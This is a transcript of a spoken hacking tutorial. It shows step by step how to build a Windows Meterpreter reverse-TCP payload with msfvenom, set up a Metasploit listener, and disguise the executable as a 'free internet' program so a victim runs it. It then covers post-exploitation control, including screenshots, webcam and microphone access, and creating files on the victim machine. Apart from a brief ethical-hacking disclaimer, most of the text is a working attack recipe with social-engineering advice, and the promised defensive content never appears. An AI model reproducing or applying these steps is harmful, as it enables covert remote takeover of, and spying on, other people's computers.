Hi guys, welcome to our tutorial. Hi guys, let me wait for some guys to get online because some guys told me that I'm really fast and most times they come when I've already started, so let's wait for some guys. So I'm waiting for like a minute before I start. As we're waiting for all these guys, I want to remind you that all this that we're doing is for education purposes. Training ethical hackers, not bad hackers, and actually hacking is actually illegal, so you do it at your own risk. I'm training ethical hackers and I'm training people on how to be cybersecurity experts, so how to avoid hackers and all that. So avoid being a bad hacker and be maybe a good hacker. You can be an ethical hacker. Okay, so let's start on our tutorial. So hi guys, I'm Mwagalwa, and today we're going to hack a Windows computer. Any Windows computer actually can be hacked using this method. Yeah, so I'm going to use Metasploit. I told you guys to download Kali Linux, and actually I'm going to be using Ubuntu, but the reason why I told you guys to download Kali Linux because most of these tools come pre-built inside. So I'm going to start my terminal. After starting my terminal, I'll just run a command called msfvenom. Then Windows / meterpreter / reverse TCP lhost, standing for the IP address of the local machine that I'm using right now. So this IP address is how to get to know the IP address. Remember I told you in Linux we use ifconfig, so I'll open another terminal by pressing Ctrl Alt and T, and I'll type ifconfig to know the IP address. So since I'm connected on a wireless LAN, I'm going to use this as my IP address is 192.168.0.114. So I'll put my IP address to be 192.168.0.114. Then I'll put my lport, the local port, as I'll use 4444, but you can use any port. That's the one I prefer to use. Then I'll put -F or -F for format. Oh, I forgot something. I'm creating a what? I'm creating a payload, so I forgot to put -P somewhere here. It's supposed to be msfvenom -P Windows, because I'm creating a payload. So -F, that's for format. The format is exe. Then negative or -A, that's for architecture. Which architecture are we creating our payload for? We're creating it for 86-bit operating system. Close angular bracket. So the reason why I use 86 is because 64 can run 86 applications, and 86 is like 32-bit application. If I use 64-bit application cannot run on a 32-bit application. So most times you won't know the operating system you're trying to attack. You won't know its architecture. Is it a 86 or a 64-bit? That's why I'm using 86. So I'll maybe call it, because I'm creating it for my friend called cjfreeinternet.exe. internet because he likes free internet so much. .exe. So the reason why I called it cjfreeinternet.exe is because I want my friend to receive this payload and install it. So there are very many ways of sending it to this friend of mine. I can decide to send it to him through a pen drive, that's a flash disk. I can decide to send it to him through email. I can create a web system. and send it to him. There are very many ways of sending it, though for this time this one is we are hacking on a network. It's on a local network, yeah. Or maybe later, maybe in future, we shall learn on how to do it off the LAN. So we are hacking on the LAN. So after it has done all this, we have created our payload, we shall start our msfconsole. Hope you're following. Give it some time to start. It's loading Metasploit. In case you're using Ubuntu, you have to first install Metasploit. Yeah, since it's done, we shall have to run these commands. Use exploit /multi /handler. Enter. Then we shall have to set payload, then space Windows, then /meterpreter /reverse _TCP. Then press enter. Then we shall set our lhost, our local IP address, to be 192.168.0.114. Then we shall set our lport, our local port, to be 4444. Oh, sorry, we have to first write set lport, yeah. So after that, we run command exploit. So when we run a command exploit, we'll need to send the file that we have created to CJ's machine. But how are we going to send the file that we've created to CJ's machine? It's actually very simple. You can send it via email, but let me just use a pen drive since this is a tutorial. So I'll open a file manager and locate it under home. It's called cjfreeinternet. It's here, 73 KBs. Then I'll paste it on my pen drive. Then eject my pen drive, and I'll put the pen drive on CJ's machine. On CJ's machine, I'll insert the pen drive. So on CJ's machine, I'll insert the pen drive or the flash disk or anything, the storage media. I'm doing this just to show you, but I could have created like a simple system where like the system you normally see, that maybe the system you normally see on internet, where someone is prompted to download something, maybe a file that will give that person free internet or free MBs or anything. So I'll open I'll open my Windows. I'll open my Windows pen drive, and after opening my Windows pen drive, I will run the CJ. So when I run this CJ application, you'll discover that via Linux a session has been started. A session has been started via Linux. So since a session has been started, we shall have to first list and see, or remember the way we had put this thing, it was running on what? It was running on okay, basically now I've entered the Windows machine. I've entered the Windows machine, so whatever I'm accessing right now is on the Windows machine. So in case I want to see maybe to check, you'll discover that all this is on the pen drive that is on the Windows machine right now, the pen drive that I put in the Windows machine. So in case I can access actually the camera and everything on the Windows machine, so in case you want to know on how to use maybe this Metasploit, on how to use the commands here, you'll just need to type help and they'll give you commands that you'll use. So all these commands can help you use. You can actually take a screenshot, you can upload, you can use the camera of that computer. Can you imagine that you can use the camera of the computer that you've actually accessed? All these commands here can help you. You can enable the microphone, you can enable all that, and basically creating folders and all that we normally use. In case you want to create a folder maybe on the other machine, you can use mkdir and maybe name the folder whatever thing you want to name it. For example, I'll create a folder on the desktop, or let me create a folder mkdir, and I'll name it you have been I'll name it you have been hacked. So the folder you have been hacked has been created, as you see here. It has been created automatically. You have been hacked. So when I take a screenshot, this is the name of the screenshot. So basically come open, then I search, first close this, I search for the screenshot that I've just taken. Okay, so let's open and view the image that we have just taken. Yeah, this is actually the screenshot of the computer that we have taken. If you check, this is the screenshot. So thank you very much. We shall start from there next time. Very soon I'll be showing you on how to prevent all this, how to prevent people from hacking you, how to harden your operating system. Today's tutorial has kind of been a long one, but you can keep on practicing and learn all these commands. Thank you.